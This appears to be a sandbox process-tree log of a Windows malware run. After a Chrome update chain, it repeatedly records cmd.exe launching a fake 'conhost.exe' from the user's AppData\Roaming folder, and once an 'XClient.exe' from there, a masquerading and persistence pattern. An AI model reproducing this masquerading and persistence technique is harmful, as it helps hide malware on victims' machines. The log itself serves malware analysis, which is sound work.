- C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\135.0.7049.96_chrome_installer.exe
  "C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\135.0.7049.96_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\guiCE2A.tmp"
  2⤵
  PID:4584
- - C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\setup.exe
    "C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\guiCE2A.tmp"
    3⤵
    PID:3940
  - - C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\setup.exe
      "C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=135.0.7049.96 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x7ff7e7e055b8,0x7ff7e7e055c4,0x7ff7e7e055d0
      4⤵
      PID:8172
  - - C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\setup.exe
      "C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
      4⤵
      PID:8736
    - - C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\setup.exe
        
        "C:\Program Files (x86)\Google\Update\Install\{9FE5AABD-0B61-4F77-8FD4-F62B7958245A}\CR_2BFC3.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=135.0.7049.96 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x7ff7e7e055b8,0x7ff7e7e055c4,0x7ff7e7e055d0
        5⤵
        
        PID:7220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6548
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6252
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5680
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5244
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2208
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6860
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2424
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4748
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6648
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2808
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7128
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7040
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4560
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6196
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6664
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6252
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:508
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6040
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6312
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6304
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6264
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4288
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4420
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3916
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3984
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1932
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6836
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5500
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3404
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5556
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6956
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6500
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6036
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3296
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5288

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:7016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7020
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6524
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1208
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1048
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3016
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1988
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4532
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6608
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6204
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4764
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6660
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4652
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6220
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6956
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6928
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2672
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6240
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7068
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4868
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2040
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1520
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6276
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6264
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1152
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2964
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5652
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1428
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3964
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3940
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1864
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5288
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1688
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5040
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3988
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6504
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4392
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4748
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3508
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4588
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1504
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4504
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6264
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5652
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6836
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7252
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7268
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6868
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7016
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1316
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2240
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7508
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7596
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6828
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6660
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7316
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7240
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7836
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6512
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1260
